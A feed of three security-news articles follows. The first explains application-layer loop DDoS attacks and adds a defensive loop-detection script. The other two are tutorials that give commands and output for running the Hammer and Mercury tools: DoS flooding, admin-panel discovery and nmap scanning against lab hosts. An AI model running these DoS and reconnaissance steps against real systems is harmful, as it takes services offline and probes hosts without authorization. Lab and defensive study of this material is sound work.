Information Security News | Cyber Security | Hacking Tutorial
https://www.securitynewspaper.com/

The Looping Attack: Application-Layer Loops as a New DDoS Attack Vector
https://www.securitynewspaper.com/2024/03/21/the-looping-attack-application-layer-loops-as-a-new-ddos-attack-vector/
Fri, 22 Mar 2024 00:02:12 +0000

In the evolving landscape of cybersecurity threats, a new class of Distributed Denial of Service (DDoS) attacks has emerged, exploiting the intricate dance between network services. This phenomenon, known as application-layer loops, presents a sophisticated challenge that goes beyond traditional network-layer defenses. By manipulating two network services into an endless exchange of error messages, attackers can create a self-sustaining cycle of communication that puts undue stress on both the servers involved and the network infrastructure connecting them.

The Mechanism of Application-Layer Loops

Application-layer loops occur when two network services are configured to respond to each other’s messages indefinitely. A practical example of this vulnerability involves two DNS resolvers that, upon receiving an error message, reply with another error message. An attacker can exploit this by sending a single, IP-spoofed DNS error message to these resolvers, triggering an infinite loop of error messages between them. This not only burdens the servers but also saturates the network links between them, potentially leading to service degradation or outright failure.

This type of vulnerability has been identified in various implementations of TFTP, DNS, and NTP protocols, as well as in six UDP-based legacy protocols including QOTD, Chargen, and Echo, which have been vulnerable by design since their inception. The attack is possible due to a vulnerability, currently tracked as CVE-2024-2169, in the implementation of the UDP protocol, which is susceptible to IP spoofing and does not provide sufficient packet verification.

Scenarios of Exploitation

The exploitation of application-layer loops opens up several attack scenarios, each with its own set of challenges for cybersecurity defenses:

Scenario A: Direct Attack on a Loop Server
An attacker targets a loop server by creating multiple loops with other servers, concentrating the attack on a single point. This can exhaust the server’s bandwidth or computational resources. Patching the server to prevent loop patterns is a crucial defense strategy.

Scenario B: Straining the Network Backbone
By pairing hosts within a network’s backbone, attackers can generate millions of loops, aiming to overload the network infrastructure. Networks that implement ingress filtering for IP-spoofed traffic can mitigate such attacks from external sources.

Scenario C: Targeting Network Links
Attackers may also orchestrate loops to congest specific Internet links, including a network’s uplink or other critical paths. This strategy requires careful pairing of internal and external loop hosts to maximize stress on the targeted link.

Scenario D: Self-Amplifying Loops
In rare instances, loop servers respond with multiple messages, leading to self-amplifying loops. These loops not only persist indefinitely but also increase in intensity, posing a significant threat even when defensive measures cause packet loss.

The Scale of Vulnerability

The operator community faces a daunting challenge, with vulnerable servers identified across TFTP (~23k hosts), DNS (~63k), NTP (~89k), Echo/RFC862 (~56k), Chargen/RFC864 (~22k), and QOTD/RFC865 (~21k). The widespread nature of these vulnerabilities, coupled with the difficulty in attributing the majority of these systems to specific products or software, complicates the mitigation process.

Action Items for Mitigation

To address this emerging threat, several action items have been proposed:

  • Notification of ASNs: Informing the operators of Autonomous Systems (ASNs) about systems within their networks that are susceptible to DoS attacks. Initiatives like Shadowserver’s one-time report to subscribed organizations are steps in the right direction.
  • Assistance in Disclosure: Facilitating the disclosure process with affected vendors and developers to identify and rectify vulnerable software products.
  • Preventive Measures: Updating or shutting down vulnerable services, restricting service access, and identifying responsible software or products are crucial steps in reducing the attack landscape.
  • Reactive Measures: Disrupting the loops through packet loss, employing Quality of Service (QoS) adjustments, rate limiting, and detecting loop patterns are effective strategies in mitigating ongoing attacks.
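
The "detecting loop patterns" measure, sketched as an added example (not code from the article or from the researchers it describes). It scans UDP packet records for server-to-server ping-pong on the service ports listed above; the function names, thresholds and sample traffic are assumptions made for illustration.

```python
from collections import defaultdict

# UDP services the article names as loop-prone, keyed by IANA well-known port.
LOOP_PRONE = {7: "Echo", 17: "QOTD", 19: "Chargen", 53: "DNS", 69: "TFTP", 123: "NTP"}

def find_loops(packets, min_rounds=20, window=10.0):
    """Flag endpoint pairs whose UDP traffic looks like an application-layer loop.

    packets: iterable of (ts, src_ip, src_port, dst_ip, dst_port).
    Heuristic (an assumption of this example): both sides speak from a
    loop-prone service port, and each side sends at least `min_rounds`
    datagrams to the other within `window` seconds.
    """
    flows = defaultdict(list)
    for ts, sip, sport, dip, dport in packets:
        if sport not in LOOP_PRONE or dport not in LOOP_PRONE:
            continue  # normal client traffic has an ephemeral port on one side
        a, b = sorted([(sip, sport), (dip, dport)])
        flows[(a, b)].append((ts, (sip, sport) == a))
    findings = []
    for (a, b), events in sorted(flows.items()):
        events.sort()
        in_window = [0, 0]  # datagrams in the sliding window sent by b, by a
        start = rounds = 0
        for ts, from_a in events:
            in_window[from_a] += 1
            while ts - events[start][0] > window:
                in_window[events[start][1]] -= 1
                start += 1
            rounds = max(rounds, min(in_window))
        if rounds < min_rounds:
            continue
        # Scenario D: a self-amplifying loop sends far more in the second half
        # of its lifetime than in the first.
        mid = (events[0][0] + events[-1][0]) / 2
        early = sum(1 for ts, _ in events if ts < mid)
        findings.append({
            "pair": (a, b),
            "services": (LOOP_PRONE[a[1]], LOOP_PRONE[b[1]]),
            "rounds": rounds,
            "self_amplifying": len(events) - early >= 2 * early,
        })
    return findings

def sample_packets():
    """Constructed traffic (documentation addresses), not a real capture."""
    pkts = []
    r1, r2 = ("192.0.2.10", 53), ("198.51.100.20", 53)
    for i in range(30):  # steady error ping-pong between two resolvers
        pkts.append((i * 0.2, *r1, *r2))
        pkts.append((i * 0.2 + 0.1, *r2, *r1))
    for i in range(5):  # ordinary client lookups: ephemeral source port
        pkts.append((i, "203.0.113.5", 40000 + i, *r1))
        pkts.append((i + 0.01, *r1, "203.0.113.5", 40000 + i))
    c, e = ("192.0.2.30", 19), ("198.51.100.40", 7)
    for s in range(8):  # reply count doubles every second
        for i in range(2 ** s):
            pkts.append((s + i * 0.005, *c, *e))
            pkts.append((s + i * 0.005 + 0.002, *e, *c))
    return pkts

if __name__ == "__main__":
    for finding in find_loops(sample_packets()):
        print(finding)
```

Flagged pairs are candidates for the rate limiting or filtering mentioned above; the thresholds need tuning against a network's legitimate server-to-server UDP traffic.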

The discovery of application-layer loops as a potential vector for DDoS attacks underscores the complexity of modern cybersecurity challenges. Unlike network-layer loops, which can be mitigated with existing defenses like TTL hop limits, application-layer loops require a combination of proactive and reactive strategies to prevent exploitation. As cyber threats continue to evolve, the cybersecurity community must remain vigilant, fostering collaboration and innovation to protect critical infrastructure and ensure the integrity of digital services.

Use Hammer Tool To Test DOS And Put Down Your Server
https://www.securitynewspaper.com/2020/09/14/use-hammer-tool-to-test-dos-and-put-down-your-server/
Mon, 14 Sep 2020 14:18:14 +0000

Introduction

DoS (Denial of Service) is always in the news. Today every company wants to implement DDoS protection to protect its servers from attack. As a cyber security researcher or ethical hacker, you should know how to test DoS in a lab environment. Today we will talk about one more such tool.

Now you can send huge traffic to any device or website by using the Hammer tool. Hammer is a DoS tool; it is a very simple tool to test a DoS attack and compromise any server by sending high traffic to the server, due to which the server will stop responding to clients. For more DDoS tools, refer to this.

NOTE: Do not run these tests on production systems; this is for informational and educational purposes only.

Environment

  • OS: Kali Linux 2020, 64 bit
  • Kernel-Version: 5.6.0

Installation steps

  • Use this command to clone the project
  • git clone https://github.com/cyweb/hammer
root@kali:/home/iicybersecurity# git clone https://github.com/cyweb/hammer
Cloning into 'hammer'...
remote: Enumerating objects: 26, done.
remote: Total 26 (delta 0), reused 0 (delta 0), pack-reused 26
Unpacking objects: 100% (26/26), 4.87 KiB | 831.00 KiB/s, done.
  • Use cd command to enter into hammer directory
root@kali:/home/iicybersecurity# cd hammer/
root@kali:/home/iicybersecurity/hammer#
  • Next, use this command to find all the help options.
  • python3 hammer.py -h
  • Now, use this command to start DOS attack on target IP address.
  • python3 hammer.py -s 192.168.0.25
  • 192.168.0.25 is the DVWA IP
  • The tool keeps sending packets to the target server. Now, let’s check the traffic sent to the target IP address by using the Wireshark application.
  • After capturing the packets in Wireshark, if we select a particular packet it displays the complete details of the packet in plain text along with the raw data. We can also see the source and destination of the packets and the protocol type.

Conclusion

So we saw how to perform a DoS attack on a particular server by sending huge traffic using different protocols. Hackers use this tool to perform DoS attacks.

Hack any website with All in One Tool
https://www.securitynewspaper.com/2019/01/01/hack-any-website-with-all-in-one-tool/
Tue, 01 Jan 2019 17:24:17 +0000

The Internet is the hub of web applications. Developers have built numerous web applications to use the Internet more effectively. The Internet has become easier to use but more complex to handle, because it exposes lots of vulnerabilities. To gather vulnerabilities we need information gathering or network reconnaissance tools. These tools give basic information about the target, which can then be used to build another scenario to exploit the target, explain ethical hacking investigators. Here comes the Mercury tool, which is used for information gathering on the target.

According to ethical hacking researchers of the International Institute of Cyber Security, Mercury comes bundled with other information gathering tools, so while testing a web application you don’t need to install separate tools.

Mercury is a tool to collect information about the target. It comprises various small tools which are used to gather information. To demonstrate, we have tested this tool on Kali Linux.

  • Before installing this tool make sure you have selenium in your Kali Linux. For that type sudo apt-get update
  • Type sudo apt-get install selenium
  • Type git clone https://github.com/MetaChar/Mercury.git
  • Then type ls
  • Type cd Mercury
  • Type pip install -r requirements.txt
pip install -r requirements.txt
Requirement already satisfied: colorama in /usr/lib/python2.7/dist-packages (from -r requirements.txt (line 1))
Collecting hashlib (from -r requirements.txt (line 2))
Using cached https://files.pythonhosted.org/packages/74/bb/9003d081345e9f0451884146e9ea2cff6e4cc4deac9ffd4a9ee98b318a49/hashlib-20081119.zip
Complete output from command python setup.py egg_info:
Traceback (most recent call last):
  File "<string>", line 1, in <module>
  File "/usr/lib/python2.7/dist-packages/setuptools/__init__.py", line 12, in <module>
    import setuptools.version
  File "/usr/lib/python2.7/dist-packages/setuptools/version.py", line 1, in <module>
    import pkg_resources
  File "/usr/lib/python2.7/dist-packages/pkg_resources/__init__.py", line 36, in <module>
    import email.parser
  File "/usr/lib/python2.7/email/parser.py", line 12, in <module>
    from email.feedparser import FeedParser
  File "/usr/lib/python2.7/email/feedparser.py", line 27, in <module>
    from email import message
  File "/usr/lib/python2.7/email/message.py", line 16, in <module>
    import email.charset
  File "/usr/lib/python2.7/email/charset.py", line 13, in <module>
    import email.base64mime
  File "/usr/lib/python2.7/email/base64mime.py", line 40, in <module>
    from email.utils import fix_eols
  File "/usr/lib/python2.7/email/utils.py", line 27, in <module>
    import random
  File "/usr/lib/python2.7/random.py", line 49, in <module>
    import hashlib as _hashlib
  File "hashlib.py", line 115, in <module>
    f()
TypeError: 'frozenset' object is not callable

----------------------------------------

Command "python setup.py egg_info" failed with error code 1 in /tmp/pip-build-hK3fYS/hashlib/
  • The above command fails while building the hashlib package listed in requirements.txt, as the traceback shows.
  • Still, the main features of Mercury that are used in information gathering can be used.
  • Type python Mercury.py
  • The above is the list of tools used in information gathering.

Checking Website Online/Offline :-

  • Type 5
  • Then type https://hack.me
Enter a choice  ~# 5
Enter a host name include https: https://www.hack.me
Attempt 1 at host: https://www.hack.me: online
Attempt 2 at host: https://www.hack.me: online
Attempt 3 at host: https://www.hack.me: online
Attempt 4 at host: https://www.hack.me: online
Attempt 5 at host: https://www.hack.me: online
  • The above command shows that the target website is online. Mercury tries to ping the target to show that it is online.
  • This is the basic method used in the initial phase of information gathering.

Getting An IP address of the Target :-

  • Type 10
  • Type hack.me
Enter a choice  ~# 10
Enter a website url hack.me
74.50.111.244
  • The above command shows the IP address of the target.

Creating a Hash Value of the Word :-

  • Type 12
  • Then type testword or any word of your choice.
Enter a choice  ~# 12
Please Enter a Word/String To Hash: testword
97d7f037cc3360e21991849c0dff4985
  • The above command can be helpful to create a hash of a word related to the target. The hash can be helpful in other hacking activities.

Download Tools Using Mercury :-

  • There are many tools in Mercury which you can download and use in information gathering. Some of the tools are already included in Kali Linux and some are basic tools that can be used.
  • Type 13
Enter a choice  ~# 13
  • Then type the number of the tool you want to install.
  • Type 6
    [0] Metasploit          [9] Aircrack
    [1] Mercury             [10] Wifite
    [2] Nmap                [11] Hammer
    [3] Lazy script         [12] Xerxes
    [4] fsociety            [13] XSStrike
    [5] Reaver              [14] Wpscan
    [6] InstaBrute          [15] Cupp
    [7] Cl0neMas3r          [16] Hydra
    [8] Sqlmap


    [100] Install All       [99] Exit submenu
Tools ~# 6
  • Then the tool will be downloaded and can be used in other hacking activities.

Use Mercury For DOS Attack :-

  • Type 23
  • Type 192.168.1.105, the target IP address.
 Enter a choice  ~# 23
Enter an ip address: 192.168.1.105
Bytes Sent to 192.168.1.105
Bytes Sent to 192.168.1.105
Bytes Sent to 192.168.1.105
  • The above command is useful in a DoS attack. DoS is one of the most popular attacks. This method can be used in other hacking activities.

Finding Admin Panel :-

  • Type 22
  • Then type www.hack.me
  • Type https
Enter a choice  ~# 22
Enter a site to scan just www: www.hack.me
Is the link https or https: https
https://www.hack.me/a
https://www.hack.me/dm
https://www.hack.me/in.
https://www.hack.me/php
https://www.hack.me/
https://www.hack.me/admin.
https://www.hack.me/html
https://www.hack.me/index.ph
https://www.hack.me/p
https://www.hack.me/login.php
https://www.hack.me/

  • The above command tries to find the admin panel of the target. This method can be used in other hacking activities.
  • Mercury uses its own wordlist to build the most common admin panel links.

Using NMAP in Mercury :-

  • Type 14
  • Type y if you have nmap installed; if not, type n.
  • Then type 192.168.1.105
Enter a choice  ~# 14
Have you already installed nmap? y/n y
Enter an ip: 192.168.1.105
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-31 04:00 EST
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 04:00
Completed NSE at 04:00, 0.00s elapsed
Initiating NSE at 04:00
Completed NSE at 04:00, 0.00s elapsed
Initiating ARP Ping Scan at 04:00
Scanning 192.168.1.105 [1 port]
Completed ARP Ping Scan at 04:00, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 04:00
Completed Parallel DNS resolution of 1 host. at 04:00, 0.09s elapsed
Initiating SYN Stealth Scan at 04:00
Scanning dvwa (192.168.1.105) [1000 ports]
Discovered open port 80/tcp on 192.168.1.105
Discovered open port 443/tcp on 192.168.1.105
Discovered open port 3306/tcp on 192.168.1.105
Discovered open port 21/tcp on 192.168.1.105
Discovered open port 22/tcp on 192.168.1.105
Completed SYN Stealth Scan at 04:00, 0.16s elapsed (1000 total ports)
Initiating Service scan at 04:00
Scanning 5 services on dvwa (192.168.1.105)
Completed Service scan at 04:01, 12.10s elapsed (5 services on 1 host)
Initiating OS detection (try #1) against dvwa (192.168.1.105)
NSE: Script scanning 192.168.1.105.
Initiating NSE at 04:01
Completed NSE at 04:01, 1.58s elapsed
Initiating NSE at 04:01
Completed NSE at 04:01, 0.00s elapsed
Nmap scan report for dvwa (192.168.1.105)
Host is up (0.00100s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.2c
22/tcp open ssh OpenSSH 5.3p1 Debian 3ubuntu4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.14 ((Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-favicon: Unknown favicon MD5: 69C728902A3F1DF75CF9EAC73BD55556
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
| http-title: Damn Vulnerable Web App (DVWA) - Login
|_Requested resource was login.php
443/tcp open ssl/http Apache httpd 2.2.14 ((Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-favicon: Unknown favicon MD5: 69C728902A3F1DF75CF9EAC73BD55556
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
| http-title: Damn Vulnerable Web App (DVWA) - Login
|_Requested resource was login.php
| ssl-cert: Subject: commonName=localhost/organizationName=Apache Friends/stateOrProvinceName=Berlin/countryName=DE
| Issuer: commonName=localhost/organizationName=Apache Friends/stateOrProvinceName=Berlin/countryName=DE
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: md5WithRSAEncryption
| Not valid before: 2004-10-01T09:10:30
| Not valid after: 2010-09-30T09:10:30
| MD5: b181 18f6 1a4d cb51 df5e 189c 40dd 3280
|_SHA-1: c4c9 a1dc 528d 41ac 1988 f65d b62f 9ca9 22fb e711
|_ssl-date: 2018-12-31T09:01:11+00:00; +4s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_IDEA_128_CBC_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
|_ SSL2_RC2_128_CBC_WITH_MD5
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:58:9E:B1 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.17 - 2.6.36
Uptime guess: 0.049 days (since Mon Dec 31 02:50:06 2018)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=198 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel


Host script results:
|_clock-skew: mean: 3s, deviation: 0s, median: 3s

TRACEROUTE
HOP RTT ADDRESS
1 1.00 ms dvwa (192.168.1.105)


NSE: Script Post-scanning.
Initiating NSE at 04:01
Completed NSE at 04:01, 0.00s elapsed
Initiating NSE at 04:01
Completed NSE at 04:01, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.90 seconds
Raw packets sent: 1020 (45.626KB) | Rcvd: 1016 (41.358KB)
  • The above command uses nmap and shows open ports, the MAC address, the OS and the other information nmap normally shows.
  • The above information can be used in other hacking activities, say ethical hacking professors.
